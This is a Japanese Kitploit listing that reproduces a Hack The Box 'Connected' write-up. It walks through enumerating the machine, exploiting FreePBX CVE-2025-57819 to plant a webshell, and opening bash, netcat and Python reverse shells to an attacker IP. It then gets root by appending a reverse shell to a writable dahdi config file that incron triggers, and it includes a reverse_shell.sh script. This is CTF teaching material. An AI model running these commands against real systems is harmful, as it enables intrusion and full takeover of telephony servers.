Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
htb-labs-connected — Hack The Box Connected マシンのライトアップ。列挙、CVE-2025-57819 の悪用、リバースシェル、FreePBX と incron を介した root への権限昇格を特集。 | Kitploit
ツール/GitHubGitHub/diegorivas1/htb-labs-connected
特権昇格脆弱性分析エクスプロイトリバースエンジニアリングウェブアプリケーション悪用情報収集CTFペネトレーションテスト学習と教育ペイロード開発
GitHubdiegorivas1/htb-labs-connected

htb-labs-connected

18時間13分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Hack The Box Connected マシンのライトアップ。列挙、CVE-2025-57819 の悪用、リバースシェル、FreePBX と incron を介した root への権限昇格を特集。

リポジトリを見る

HTB: Connected - スタッフピック

English | Español

HTB Difficulty OS Platform

📋 目次

  1. 列挙
  2. 悪用 - CVE-2025-57819
  3. リバースシェル
  4. 権限昇格
  5. フラグ
  6. リポジトリ構成
  7. 使用したスクリプトとツール
  8. 攻撃の概要
  9. リソースとクレジット
  10. 補足

1. 列挙

1.1 Nmapによるポートスキャン

root@kitploit:~
nmap -sV 10.129.81.130

結果:

root@kitploit:~
PORT    STATE SERVICE   VERSION
22/tcp  open  ssh       OpenSSH 7.4 (protocol 2.0)
80/tcp  open  http      Apache httpd 2.4.6 (CentOS) PHP/7.4.16
443/tcp open  ssl/https Apache/2.4.6 (CentOS) PHP/7.4.16

1.2 ドメインを/etc/hostsに追加

root@kitploit:~
echo "10.129.81.130 connected.htb" >> /etc/hosts

1.3 Gobusterによるディレクトリファジング

root@kitploit:~
gobuster dir -u http://connected.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

主な発見:

  • /admin - FreePBX管理パネル
  • /ucp - ユーザーコントロールパネル
  • /robots.txt - Robotsファイル

2. 悪用 - CVE-2025-57819

2.1 エクスプロイトのダウンロード

WatchTowr Labsリポジトリをクローン:

root@kitploit:~
git clone https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819.git
cd watchTowr-vs-FreePBX-CVE-2025-57819

2.2 エクスプロイトの実行

root@kitploit:~
python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://connected.htb

期待される出力:

root@kitploit:~
[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[+] VULNERABLE - webshell found: http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=hostname

2.3 ウェブシェルの確認

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=whoami"

結果:

root@kitploit:~
asterisk

3. リバースシェル

3.1 Kaliでリスナーを起動

root@kitploit:~
nc -lvnp 4444

3.2 リバースシェルの注入

エンコード版:

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.234%2F4444%200%3E%261%27"

注意: 10.10.14.234 を自分のVPN IPに置き換えてください。

3.3 代替手段

Netcat

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=nc%20-e%20/bin/bash%2010.10.14.234%204444"

Python

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%2210.10.14.234%22%2C4444))%3Bos.dup2(s.fileno()%2C0)%3Bos.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bsubprocess.call([%22/bin/bash%22%2C%22-i%22])%27"

3.4 取得したシェル

root@kitploit:~
listening on [any] 4444 ...
connect to [10.10.14.234] from (UNKNOWN) [10.129.81.130] 55944
bash: no job control in this shell
[asterisk@connected html]$

4. 権限昇格

4.1 書き込み可能な設定ファイルを探す

root@kitploit:~
find /etc -name "*.conf" -writable 2>/dev/null

主な結果:

root@kitploit:~
/etc/dahdi/init.conf

4.2 incron.dを確認

root@kitploit:~
cat /etc/incron.d/*

関連エントリ:

root@kitploit:~
/var/spool/asterisk/sysadmin/dahdi_restart IN_CLOSE_WRITE /usr/sbin/sysadmin_dahdi_restart

4.3 init.confにリバースシェルを追加

root@kitploit:~
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.234/4545 0>&1"' >> /etc/dahdi/init.conf

4.4 ルートシェルリスナーを起動

root@kitploit:~
nc -lvnp 4545

4.5 サービス再起動をトリガー

root@kitploit:~
echo "Restart" >> /var/spool/asterisk/sysadmin/dahdi_restart

4.6 ルートシェル取得

root@kitploit:~
connect to [10.10.14.234] from (UNKNOWN) [10.129.81.130] 45996
bash: no job control in this shell
[root@connected /]#

4.7 ルートアクセスを確認

root@kitploit:~
whoami
# root

id
# uid=0(root) gid=0(root) groups=0(root)

5. フラグ

5.1 ユーザーフラグ

root@kitploit:~
cat /home/asterisk/user.txt
root@kitploit:~
HTB{...user_flag...}

5.2 ルートフラグ

root@kitploit:~
cat /root/root.txt
root@kitploit:~
HTB{...root_flag...}

フラグはこのリポジトリから意図的に省略されています。


6. リポジトリ構成

root@kitploit:~
htb-labs-connected/
├── README.md
├── README-ES.md
├── exploits/
│   ├── watchTowr-vs-FreePBX-CVE-2025-57819/
│   ├── CVE-2025-57819-exploit/
│   └── CVE-2025-57819-poc/
├── payloads/
│   └── reverse_shell.sh
├── scans/
│   ├── nmap_scan.txt
│   └── gobuster_results.txt
├── screenshots/
└── flags/

7. 使用したスクリプトとツール

7.1 リバースシェルスクリプト

ファイル: payloads/reverse_shell.sh

root@kitploit:~
#!/bin/bash

# Reverse shell for HTB Connected
# Usage: ./reverse_shell.sh 10.10.14.234 4444

IP=$1
PORT=$2

if [ -z "$IP" ] || [ -z "$PORT" ]; then
    echo "Usage: $0 <IP> <PORT>"
    exit 1
fi

bash -c "bash -i >& /dev/tcp/$IP/$PORT 0>&1"

7.2 列挙コマンド

ファイル: scans/nmap_scan.txt

root@kitploit:~
# Full port scan
nmap -sV -p- -T4 10.129.81.130

# Service and default script scan
nmap -sC -sV -p22,80,443 10.129.81.130

7.3 ファジングコマンド

ファイル: scans/gobuster_results.txt

root@kitploit:~
# Directory fuzzing
gobuster dir \
    -u http://connected.htb \
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
    -x php,txt,html

# Fuzzing the admin directory
gobuster dir \
    -u http://connected.htb/admin \
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
    -x php,txt,html,conf,ini,bak

8. 攻撃の概要


9. リソースとクレジット

  • オリジナルライトアップ: CyberSaif
  • WatchTowr Labsエクスプロイト: GitHub
  • CVE-2025-57819: SentinelOne
  • FreePBXセキュリティアドバイザリ: GitHub

10. 補足

10.1 ウェブシェルが作成されない場合

  • 丸2分間待ってください。エクスプロイトはアーティファクトの作成に時間を要します。
  • 接続を確認:
root@kitploit:~
curl -k https://connected.htb

10.2 リスナーが機能しない場合

VPNインターフェースを確認:

root@kitploit:~
ip addr show tun0

必要に応じて別のリスニングポートを試してください:

root@kitploit:~
4445
8080
1234

10.3 ターゲット上の主要ファイル

  • /etc/dahdi/init.conf - 権限昇格中に使用された書き込み可能な設定ファイル
  • /etc/incron.d/ - incron設定ディレクトリ
  • /var/spool/asterisk/sysadmin/dahdi_restart - 再起動アクションを実行するために使用されるトリガー
  • /var/www/html/ - Webサーバーのドキュメントルート

🏁 結論

Connectedは正常に完了しました。 ✅

この攻撃チェーンは、公開されたFreePBXインスタンスがCVE-2025-57819を通じて初期アクセスにつながり、その後、書き込み可能な設定ファイルとincronベースのトリガーによる権限昇格につながることを示しています。

ツールをダウンロード
ステップアクション結果
1Nmapポート22、80、443が開放
2Gobuster/admin、/ucp、/robots.txtを発見
3CVE-2025-57819asteriskとしてウェブシェル取得
4リバースシェルasteriskとして対話型シェル取得
5権限昇格incron.d → dahdi_restart → init.conf
6ルートルートシェル取得